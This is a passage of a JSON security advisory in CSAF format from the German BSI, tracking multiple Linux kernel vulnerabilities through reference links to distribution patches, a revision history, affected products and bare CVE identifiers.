"summary": "Linux Kernel CVE Announcement CVE-2026-22995",
"url": "https://lore.kernel.org/linux-cve-announce/2026012352-CVE-2026-22995-7465@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2026-22996",
"url": "https://lore.kernel.org/linux-cve-announce/2026012532-CVE-2026-22996-f977@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2026-22997",
"url": "https://lore.kernel.org/linux-cve-announce/2026012533-CVE-2026-22997-42ca@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2026-22998",
"url": "https://lore.kernel.org/linux-cve-announce/2026012533-CVE-2026-22998-8392@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2026-22999",
"url": "https://lore.kernel.org/linux-cve-announce/2026012533-CVE-2026-22999-c098@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2026-23000",
"url": "https://lore.kernel.org/linux-cve-announce/2026012534-CVE-2026-23000-36e1@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2026-23001",
"url": "https://lore.kernel.org/linux-cve-announce/2026012534-CVE-2026-23001-7ab0@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2026-23002",
"url": "https://lore.kernel.org/linux-cve-announce/2026012534-CVE-2026-23002-ffa4@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2026-23003",
"url": "https://lore.kernel.org/linux-cve-announce/2026012535-CVE-2026-23003-e684@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2026-23004",
"url": "https://lore.kernel.org/linux-cve-announce/2026012535-CVE-2026-23004-205e@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2026-23005",
"url": "https://lore.kernel.org/linux-cve-announce/2026012536-CVE-2026-23005-df15@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2026-23006",
"url": "https://lore.kernel.org/linux-cve-announce/2026012536-CVE-2026-23006-241b@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2026-23007",
"url": "https://lore.kernel.org/linux-cve-announce/2026012536-CVE-2026-23007-38b1@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2026-23008",
"url": "https://lore.kernel.org/linux-cve-announce/2026012537-CVE-2026-23008-d435@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2026-23009",
"url": "https://lore.kernel.org/linux-cve-announce/2026012537-CVE-2026-23009-7209@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2026-23010",
"url": "https://lore.kernel.org/linux-cve-announce/2026012537-CVE-2026-23010-91ab@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2026-23011",
"url": "https://lore.kernel.org/linux-cve-announce/2026012538-CVE-2026-23011-d4fd@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2026-23012",
"url": "https://lore.kernel.org/linux-cve-announce/2026012538-CVE-2026-23012-8a3d@gregkh/"
},
{
"category": "external",
"summary": "Linux Kernel CVE Announcement CVE-2026-23013",
"url": "https://lore.kernel.org/linux-cve-announce/2026012538-CVE-2026-23013-303c@gregkh/"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:2264 vom 2026-02-09",
"url": "https://access.redhat.com/errata/RHSA-2026:2264"
},
{
"category": "external",
"summary": "Debian Security Advisory DSA-6126 vom 2026-02-09",
"url": "https://lists.debian.org/debian-security-announce/2026/msg00035.html"
},
{
"category": "external",
"summary": "Debian Security Advisory DSA-6127 vom 2026-02-10",
"url": "https://lists.debian.org/debian-security-announce/2026/msg00036.html"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:2378 vom 2026-02-10",
"url": "https://access.redhat.com/errata/RHSA-2026:2378"
},
{
"category": "external",
"summary": "Oracle Linux Security Advisory ELSA-2026-2264 vom 2026-02-10",
"url": "https://linux.oracle.com/errata/ELSA-2026-2264.html"
},
{
"category": "external",
"summary": "Debian Security Advisory DLA-4475 vom 2026-02-11",
"url": "https://lists.debian.org/debian-lts-announce/2026/02/msg00016.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2026:0447-1 vom 2026-02-11",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-February/024124.html"
},
{
"category": "external",
"summary": "Debian Security Advisory DLA-4476 vom 2026-02-11",
"url": "https://lists.debian.org/debian-lts-announce/2026/02/msg00017.html"
},
{
"category": "external",
"summary": "Ubuntu Security Notice USN-8034-1 vom 2026-02-12",
"url": "https://ubuntu.com/security/notices/USN-8034-1"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2026:0475-1 vom 2026-02-12",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-February/024139.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2026:0473-1 vom 2026-02-12",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-February/024136.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2026:0474-1 vom 2026-02-12",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-February/024140.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2026:0471-1 vom 2026-02-12",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-February/024142.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2026:0472-1 vom 2026-02-12",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-February/024141.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2026:0496-1 vom 2026-02-13",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-February/024158.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2026:0495-1 vom 2026-02-13",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-February/024159.html"
},
{
"category": "external",
"summary": "Rocky Linux Security Advisory RLSA-2026:2264 vom 2026-02-15",
"url": "https://errata.build.resf.org/RLSA-2026:2264"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:2721 vom 2026-02-16",
"url": "https://access.redhat.com/errata/RHSA-2026:2721"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:2722 vom 2026-02-16",
"url": "https://access.redhat.com/errata/RHSA-2026:2722"
},
{
"category": "external",
"summary": "Oracle Linux Security Advisory ELSA-2026-2721 vom 2026-02-17",
"url": "https://linux.oracle.com/errata/ELSA-2026-2721.html"
},
{
"category": "external",
"summary": "Oracle Linux Security Advisory ELSA-2026-2722 vom 2026-02-17",
"url": "https://linux.oracle.com/errata/ELSA-2026-2722.html"
},
{
"category": "external",
"summary": "Ubuntu Security Notice USN-8034-2 vom 2026-02-17",
"url": "https://ubuntu.com/security/notices/USN-8034-2"
},
{
"category": "external",
"summary": "Amazon Linux Security Advisory ALAS2KERNEL-5.10-2026-113 vom 2026-02-19",
"url": "https://alas.aws.amazon.com/AL2/ALAS2KERNEL-5.10-2026-113.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2026:0587-1 vom 2026-02-20",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-February/024356.html"
},
{
"category": "external",
"summary": "Rocky Linux Security Advisory RLSA-2026:2722 vom 2026-02-24",
"url": "https://errata.build.resf.org/RLSA-2026:2722"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2026:0617-1 vom 2026-02-24",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-February/024378.html"
},
{
"category": "external",
"summary": "Rocky Linux Security Advisory RLSA-2026:2721 vom 2026-02-24",
"url": "https://errata.build.resf.org/RLSA-2026:2721"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2026:20479-1 vom 2026-02-26",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-February/024407.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2026:20477-1 vom 2026-02-26",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-February/024409.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2026:20498-1 vom 2026-02-27",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-February/024476.html"
},
{
"category": "external",
"summary": "openSUSE Security Update OPENSUSE-SU-2026:20287-1 vom 2026-02-28",
"url": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/K7KIWX7XP3UMVFSHT47OOZ24TQQYNNHI/"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2026:20520-1 vom 2026-02-27",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-February/024455.html"
},
{
"category": "external",
"summary": "Amazon Linux Security Advisory ALAS2KERNEL-5.15-2026-098 vom 2026-03-06",
"url": "https://alas.aws.amazon.com/AL2/ALAS2KERNEL-5.15-2026-098.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2026:20599-1 vom 2026-03-05",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/024614.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2026:20570-1 vom 2026-03-05",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/024574.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2026:20615-1 vom 2026-03-05",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/024605.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2026:20555-1 vom 2026-03-05",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/024590.html"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:3966 vom 2026-03-09",
"url": "https://access.redhat.com/errata/RHSA-2026:3966"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:3964 vom 2026-03-09",
"url": "https://access.redhat.com/errata/RHSA-2026:3964"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:3963 vom 2026-03-09",
"url": "https://access.redhat.com/errata/RHSA-2026:3963"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:4012 vom 2026-03-09",
"url": "https://access.redhat.com/errata/RHSA-2026:4012"
},
{
"category": "external",
"summary": "Oracle Linux Security Advisory ELSA-2026-3963 vom 2026-03-09",
"url": "https://linux.oracle.com/errata/ELSA-2026-3963.html"
},
{
"category": "external",
"summary": "Oracle Linux Security Advisory ELSA-2026-4012 vom 2026-03-10",
"url": "https://linux.oracle.com/errata/ELSA-2026-4012.html"
},
{
"category": "external",
"summary": "Oracle Linux Security Advisory ELSA-2026-3966 vom 2026-03-10",
"url": "https://linux.oracle.com/errata/ELSA-2026-3966.html"
},
{
"category": "external",
"summary": "Oracle Linux Security Advisory ELSA-2026-50145 vom 2026-03-12",
"url": "https://linux.oracle.com/errata/ELSA-2026-50145.html"
},
{
"category": "external",
"summary": "Oracle Linux Security Advisory ELSA-2026-50144 vom 2026-03-11",
"url": "https://linux.oracle.com/errata/ELSA-2026-50144.html"
},
{
"category": "external",
"summary": "Ubuntu Security Notice USN-8096-1 vom 2026-03-17",
"url": "https://ubuntu.com/security/notices/USN-8096-1"
},
{
"category": "external",
"summary": "Ubuntu Security Notice USN-8096-2 vom 2026-03-17",
"url": "https://ubuntu.com/security/notices/USN-8096-2"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:4723 vom 2026-03-17",
"url": "https://access.redhat.com/errata/RHSA-2026:4723"
},
{
"category": "external",
"summary": "Ubuntu Security Notice USN-8096-4 vom 2026-03-17",
"url": "https://ubuntu.com/security/notices/USN-8096-4"
},
{
"category": "external",
"summary": "Ubuntu Security Notice USN-8096-3 vom 2026-03-17",
"url": "https://ubuntu.com/security/notices/USN-8096-3"
},
{
"category": "external",
"summary": "Oracle Linux Security Advisory ELSA-2026-4723 vom 2026-03-17",
"url": "https://linux.oracle.com/errata/ELSA-2026-4723.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2026:20667-1 vom 2026-03-18",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/024746.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2026:0928-1 vom 2026-03-18",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/024762.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2026:20711-1 vom 2026-03-18",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/024715.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2026:20713-1 vom 2026-03-19",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/024771.html"
},
{
"category": "external",
"summary": "Amazon Linux Security Advisory ALAS2KERNEL-5.10-2026-114 vom 2026-03-19",
"url": "https://alas.aws.amazon.com/AL2/ALAS2KERNEL-5.10-2026-114.html"
},
{
"category": "external",
"summary": "Amazon Linux Security Advisory ALAS2KERNEL-5.15-2026-099 vom 2026-03-19",
"url": "https://alas.aws.amazon.com/AL2/ALAS2KERNEL-5.15-2026-099.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2026:20720-1 vom 2026-03-19",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/024766.html"
},
{
"category": "external",
"summary": "Red Hat Security Advisory RHSA-2026:5197 vom 2026-03-23",
"url": "https://access.redhat.com/errata/RHSA-2026:5197"
},
{
"category": "external",
"summary": "Ubuntu Security Notice USN-8116-1 vom 2026-03-23",
"url": "https://ubuntu.com/security/notices/USN-8116-1"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2026:0962-1 vom 2026-03-23",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/024803.html"
},
{
"category": "external",
"summary": "Ubuntu Security Notice USN-8096-5 vom 2026-03-23",
"url": "https://ubuntu.com/security/notices/USN-8096-5"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2026:0961-1 vom 2026-03-23",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/024805.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2026:20794-1 vom 2026-03-25",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/024895.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2026:20772-1 vom 2026-03-24",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/024862.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2026:20819-1 vom 2026-03-24",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/024871.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2026:0984-1 vom 2026-03-24",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/024841.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2026:1041-1 vom 2026-03-25",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/024928.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2026:1003-1 vom 2026-03-25",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/024925.html"
},
{
"category": "external",
"summary": "Rocky Linux Security Advisory RLSA-2026:3964 vom 2026-03-26",
"url": "https://errata.build.resf.org/RLSA-2026:3964"
},
{
"category": "external",
"summary": "Rocky Linux Security Advisory RLSA-2026:3963 vom 2026-03-26",
"url": "https://errata.build.resf.org/RLSA-2026:3963"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2026:1081-1 vom 2026-03-26",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/024953.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2026:1077-1 vom 2026-03-26",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/024956.html"
},
{
"category": "external",
"summary": "SUSE Security Update SUSE-SU-2026:1078-1 vom 2026-03-26",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/024954.html"
}
],
"source_lang": "en-US",
"title": "Linux Kernel: Mehrere Schwachstellen",
"tracking": {
"current_release_date": "2026-03-26T23:00:00.000+00:00",
"generator": {
"date": "2026-03-27T09:11:13.251+00:00",
"engine": {
"name": "BSI-WID",
"version": "1.5.0"
}
},
"id": "WID-SEC-W-2026-0215",
"initial_release_date": "2026-01-25T23:00:00.000+00:00",
"revision_history": [
{
"date": "2026-01-25T23:00:00.000+00:00",
"number": "1",
"summary": "Initiale Fassung"
},
{
"date": "2026-01-26T23:00:00.000+00:00",
"number": "2",
"summary": "Referenz(en) aufgenommen: EUVD-2026-4616, EUVD-2026-4617, EUVD-2026-4623, EUVD-2026-4626, EUVD-2026-4619, EUVD-2026-4625, EUVD-2026-4628"
},
{
"date": "2026-02-08T23:00:00.000+00:00",
"number": "3",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2026-02-09T23:00:00.000+00:00",
"number": "4",
"summary": "Neue Updates von Debian und Red Hat aufgenommen"
},
{
"date": "2026-02-10T23:00:00.000+00:00",
"number": "5",
"summary": "Neue Updates von Oracle Linux aufgenommen"
},
{
"date": "2026-02-11T23:00:00.000+00:00",
"number": "6",
"summary": "Neue Updates von Debian und SUSE aufgenommen"
},
{
"date": "2026-02-12T23:00:00.000+00:00",
"number": "7",
"summary": "Neue Updates von SUSE aufgenommen"
},
{
"date": "2026-02-15T23:00:00.000+00:00",
"number": "8",
"summary": "Neue Updates von SUSE und Rocky Enterprise Software Foundation aufgenommen"
},
{
"date": "2026-02-16T23:00:00.000+00:00",
"number": "9",
"summary": "Neue Updates von Red Hat und Oracle Linux aufgenommen"
},
{
"date": "2026-02-17T23:00:00.000+00:00",
"number": "10",
"summary": "Neue Updates von Oracle Linux und Ubuntu aufgenommen"
},
{
"date": "2026-02-18T23:00:00.000+00:00",
"number": "11",
"summary": "Neue Updates von Amazon aufgenommen"
},
{
"date": "2026-02-22T23:00:00.000+00:00",
"number": "12",
"summary": "Neue Updates von SUSE aufgenommen"
},
{
"date": "2026-02-24T23:00:00.000+00:00",
"number": "13",
"summary": "Neue Updates von Rocky Enterprise Software Foundation und SUSE aufgenommen"
},
{
"date": "2026-02-26T23:00:00.000+00:00",
"number": "14",
"summary": "Neue Updates von SUSE aufgenommen"
},
{
"date": "2026-03-01T23:00:00.000+00:00",
"number": "15",
"summary": "Neue Updates von SUSE und openSUSE aufgenommen"
},
{
"date": "2026-03-05T23:00:00.000+00:00",
"number": "16",
"summary": "Neue Updates von Amazon und SUSE aufgenommen"
},
{
"date": "2026-03-08T23:00:00.000+00:00",
"number": "17",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2026-03-09T23:00:00.000+00:00",
"number": "18",
"summary": "Neue Updates von Oracle Linux aufgenommen"
},
{
"date": "2026-03-10T23:00:00.000+00:00",
"number": "19",
"summary": "Neue Updates von Oracle Linux aufgenommen"
},
{
"date": "2026-03-11T23:00:00.000+00:00",
"number": "20",
"summary": "Neue Updates von Oracle Linux aufgenommen"
},
{
"date": "2026-03-16T23:00:00.000+00:00",
"number": "21",
"summary": "Neue Updates von Ubuntu aufgenommen"
},
{
"date": "2026-03-17T23:00:00.000+00:00",
"number": "22",
"summary": "Neue Updates von Red Hat, Ubuntu und Oracle Linux aufgenommen"
},
{
"date": "2026-03-18T23:00:00.000+00:00",
"number": "23",
"summary": "Neue Updates von SUSE aufgenommen"
},
{
"date": "2026-03-19T23:00:00.000+00:00",
"number": "24",
"summary": "Neue Updates von SUSE und Amazon aufgenommen"
},
{
"date": "2026-03-22T23:00:00.000+00:00",
"number": "25",
"summary": "Neue Updates von Red Hat aufgenommen"
},
{
"date": "2026-03-23T23:00:00.000+00:00",
"number": "26",
"summary": "Neue Updates von Ubuntu und SUSE aufgenommen"
},
{
"date": "2026-03-24T23:00:00.000+00:00",
"number": "27",
"summary": "Neue Updates von SUSE aufgenommen"
},
{
"date": "2026-03-25T23:00:00.000+00:00",
"number": "28",
"summary": "Neue Updates von SUSE aufgenommen"
},
{
"date": "2026-03-26T23:00:00.000+00:00",
"number": "29",
"summary": "Neue Updates von SUSE aufgenommen"
}
],
"status": "final",
"version": "29"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Amazon Linux 2",
"product": {
"name": "Amazon Linux 2",
"product_id": "398363",
"product_identification_helper": {
"cpe": "cpe:/o:amazon:linux_2:-"
}
}
}
],
"category": "vendor",
"name": "Amazon"
},
{
"branches": [
{
"category": "product_name",
"name": "Debian Linux",
"product": {
"name": "Debian Linux",
"product_id": "2951",
"product_identification_helper": {
"cpe": "cpe:/o:debian:debian_linux:-"
}
}
}
],
"category": "vendor",
"name": "Debian"
},
{
"branches": [
{
"category": "product_name",
"name": "Open Source Linux Kernel",
"product": {
"name": "Open Source Linux Kernel",
"product_id": "T050304",
"product_identification_helper": {
"cpe": "cpe:/o:linux:linux_kernel:-"
}
}
}
],
"category": "vendor",
"name": "Open Source"
},
{
"branches": [
{
"category": "product_name",
"name": "Oracle Linux",
"product": {
"name": "Oracle Linux",
"product_id": "T004914",
"product_identification_helper": {
"cpe": "cpe:/o:oracle:linux:-"
}
}
}
],
"category": "vendor",
"name": "Oracle"
},
{
"branches": [
{
"category": "product_name",
"name": "RESF Rocky Linux",
"product": {
"name": "RESF Rocky Linux",
"product_id": "T032255",
"product_identification_helper": {
"cpe": "cpe:/o:resf:rocky_linux:-"
}
}
}
],
"category": "vendor",
"name": "RESF"
},
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux",
"product": {
"name": "Red Hat Enterprise Linux",
"product_id": "67646",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:-"
}
}
}
],
"category": "vendor",
"name": "Red Hat"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux",
"product": {
"name": "SUSE Linux",
"product_id": "T002207",
"product_identification_helper": {
"cpe": "cpe:/o:suse:suse_linux:-"
}
}
},
{
"category": "product_name",
"name": "SUSE openSUSE",
"product": {
"name": "SUSE openSUSE",
"product_id": "T027843",
"product_identification_helper": {
"cpe": "cpe:/o:suse:opensuse:-"
}
}
}
],
"category": "vendor",
"name": "SUSE"
},
{
"branches": [
{
"category": "product_name",
"name": "Ubuntu Linux",
"product": {
"name": "Ubuntu Linux",
"product_id": "T000126",
"product_identification_helper": {
"cpe": "cpe:/o:canonical:ubuntu_linux:-"
}
}
}
],
"category": "vendor",
"name": "Ubuntu"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-71145",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2025-71145"
},
{
"cve": "CVE-2025-71146",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2025-71146"
},
{
"cve": "CVE-2025-71147",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2025-71147"
},
{
"cve": "CVE-2025-71148",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2025-71148"
},
{
"cve": "CVE-2025-71149",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2025-71149"
},
{
"cve": "CVE-2025-71150",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2025-71150"
},
{
"cve": "CVE-2025-71151",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2025-71151"
},
{
"cve": "CVE-2025-71152",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2025-71152"
},
{
"cve": "CVE-2025-71153",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2025-71153"
},
{
"cve": "CVE-2025-71154",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2025-71154"
},
{
"cve": "CVE-2025-71155",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2025-71155"
},
{
"cve": "CVE-2025-71156",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2025-71156"
},
{
"cve": "CVE-2025-71157",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2025-71157"
},
{
"cve": "CVE-2025-71158",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2025-71158"
},
{
"cve": "CVE-2025-71159",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2025-71159"
},
{
"cve": "CVE-2025-71160",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2025-71160"
},
{
"cve": "CVE-2025-71161",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2025-71161"
},
{
"cve": "CVE-2025-71162",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2025-71162"
},
{
"cve": "CVE-2025-71163",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2025-71163"
},
{
"cve": "CVE-2026-22978",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2026-22978"
},
{
"cve": "CVE-2026-22979",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2026-22979"
},
{
"cve": "CVE-2026-22980",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2026-22980"
},
{
"cve": "CVE-2026-22981",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2026-22981"
},
{
"cve": "CVE-2026-22982",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2026-22982"
},
{
"cve": "CVE-2026-22983",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2026-22983"
},
{
"cve": "CVE-2026-22984",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2026-22984"
},
{
"cve": "CVE-2026-22985",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
"T004914",
"T032255"
]
},
"release_date": "2026-01-25T23:00:00.000+00:00",
"title": "CVE-2026-22985"
},
{
"cve": "CVE-2026-22986",
"product_status": {
"known_affected": [
"2951",
"T002207",
"67646",
"T050304",
"T000126",
"T027843",
"398363",
